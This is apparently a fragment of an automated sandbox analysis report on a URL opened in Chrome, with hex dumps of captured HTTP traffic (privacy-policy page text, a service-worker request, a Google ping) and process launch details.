                                                          Data Ascii: theuploading user, or a copyright complaint by the rightful owner. Therefore, by uploading any content to our site, you agree that you grant us a universal,perpetual, sublicensable, commercial and non-commercial, irrevocable license to use such conte
                                                          2023-11-27 03:24:42 UTC1369INData Raw: 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 57 65 20 6d 61 79 20 61 6c 73 6f 20 63 6f 6c 6c 65 63 74 20 61 6e 64 20 73 74 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 61 73 20 79 6f 75 20 6e 61 76 69 67 61 74 65 20 6f 6e 6c 69 6e 65 20 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 77 65 20 6d 61 79 20 63 6f 6c 6c 65 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 61 62 6f 75 74 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 27 73 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 6f 20 74 68 65 20 49 6e 74 65 72 6e 65 74 2c 20 77 68 69 63 68 20 61 6c 6c 6f 77 73 20 75 73 2c 20 61 6d 6f 6e 67 20 6f 74 68 65
                                                          Data Ascii: .</p><p dir="ltr">We may also collect and store information that is generated automatically as you navigate online through the Site. For example, we may collect informationabout your computer's connection to the Internet, which allows us, among othe
                                                          2023-11-27 03:24:42 UTC1369INData Raw: 6f 76 69 64 65 72 73 20 61 6e 64 20 63 6f 6e 74 72 61 63 74 6f 72 73 20 66 6f 72 20 61 20 76 61 72 69 65 74 79 20 6f 66 0a 09 70 75 72 70 6f 73 65 73 2e 20 55 6e 6c 65 73 73 20 79 6f 75 20 69 6e 66 6f 72 6d 20 75 73 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 70 72 6f 63 65 73 73 20 64 65 73 63 72 69 62 65 64 20 62 65 6c 6f 77 2c 20 77 65 20 72 65 73 65 72 76 65 20 74 68 65 20 72 69 67 68 74 20 74 6f 20 75 73 65 2c 20 61 6e 64 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 6f 20 74 68 69 72 64 20 70 61 72 74 69 65 73 2c 20 61 6c 6c 20 6f 66 20 74 68 65 0a 09 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 63 6f 6c 6c 65 63 74 65 64 20 66 72 6f 6d 20 61 6e 64 20 61 62 6f 75 74 20 79 6f 75 20 77 68 69 6c 65 20 79 6f 75 20 61 72 65 20 75 73 69 6e
                                                          Data Ascii: oviders and contractors for a variety ofpurposes. Unless you inform us in accordance with the process described below, we reserve the right to use, and to disclose to third parties, all of theinformation collected from and about you while you are usin
                                                          2023-11-27 03:24:42 UTC1369INData Raw: 69 6f 6e 20 74 68 65 79 20 63 6f 6c 6c 65 63 74 20 74 6f 20 68 65 6c 70 20 70 72 65 73 65 6e 74 20 74 68 65 69 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 2c 20 74 6f 0a 09 68 65 6c 70 20 6d 65 61 73 75 72 65 20 61 6e 64 20 72 65 73 65 61 72 63 68 20 74 68 65 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 27 20 65 66 66 65 63 74 69 76 65 6e 65 73 73 2c 20 6f 72 20 66 6f 72 20 6f 74 68 65 72 20 70 75 72 70 6f 73 65 73 2e 20 54 68 65 20 75 73 65 20 61 6e 64 20 63 6f 6c 6c 65 63 74 69 6f 6e 20 6f 66 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 62 79 20 74 68 65 73 65 20 74 68 69 72 64 2d 70 61 72 74 79 0a 09 61 64 76 65 72 74 69 73 65 72 73 20 61 6e 64 20 61 64 20 73 65 72 76 65 72 73 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 74 68 65 20 72
                                                          Data Ascii: ion they collect to help present their advertisements, tohelp measure and research the advertisements' effectiveness, or for other purposes. The use and collection of your information by these third-partyadvertisers and ad servers is governed by the r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          56192.168.2.549783104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:46 UTC733OUTGET /service_worker.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          Accept: */*
                                                          Service-Worker: script
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: same-origin
                                                          Sec-Fetch-Dest: serviceworker
                                                          Referer: https://sofa.thriveuniversehq.com/service_worker.js
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          If-None-Match: W/"56-6089030eb3a5a-gzip"
                                                          If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
                                                          2023-11-27 03:24:46 UTC665INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 34 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 35 36 2d 36 30 38 39 30 33 30 65 62 33 61 35 61 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 33 35 36 31 0d 0a 52 65 70 6f 72 74 2d 54 6f
                                                          Data Ascii: HTTP/1.1 304 Not ModifiedDate: Mon, 27 Nov 2023 03:24:46 GMTConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:49 GMTETag: "56-6089030eb3a5a-gzip"Vary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: HITAge: 3561Report-To


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          57192.168.2.549787172.253.122.1024434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:25:08 UTC449OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000061077E5FEE HTTP/1.1
                                                          Host: clients1.google.com
                                                          Connection: keep-alive
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: empty
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          2023-11-27 03:25:09 UTC817INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 73 63 72 69 70 74 2d 73 72 63 20 27 72 65 70 6f 72 74 2d 73 61 6d 70 6c 65 27 20 27 6e 6f 6e 63 65 2d 6d 75 52 4d 64 41 46 6f 4d 66 47 42 63 79 4a 6b 50 4f 31 47 4f 77 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 73 74 72 69 63 74 2d 64 79 6e 61 6d 69 63 27 20 68 74 74 70 73 3a 20 68 74 74 70 3a 3b 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 72 65 70 6f 72 74 2d 75 72 69 20 68 74 74 70 73 3a 2f 2f 63 73 70 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 73 70 2f 64 6f 77 6e 6c 6f 61 64 2d 64 74 2f 31 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50
                                                          Data Ascii: HTTP/1.1 200 OKContent-Security-Policy: script-src 'report-sample' 'nonce-muRMdAFoMfGBcyJkPO1GOw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1Content-Security-P
                                                          2023-11-27 03:25:09 UTC220INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 38 35 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 38 35 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 38 35 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 38 35 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 38 35 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 38 35 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 64 65 34 66 37 31 37 63 0a
                                                          Data Ascii: rlzC1: 1C1ONGR_enUS1085rlzC2: 1C2ONGR_enUS1085rlzC7: 1C7ONGR_enUS1085dcc: set_dcc: C1:1C1ONGR_enUS1085,C2:1C2ONGR_enUS1085,C7:1C7ONGR_enUS1085events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: de4f717c


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:04:23:36
                                                          Start date:27/11/2023
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                          Imagebase:0x7ff715980000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:2
                                                          Start time:04:23:37
                                                          Start date:27/11/2023
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2220,i,6617707891209174409,3735623123366737918,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                          Imagebase:0x7ff715980000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:04:23:39
                                                          Start date:27/11/2023
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html
                                                          Imagebase:0x7ff715980000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          No disassembly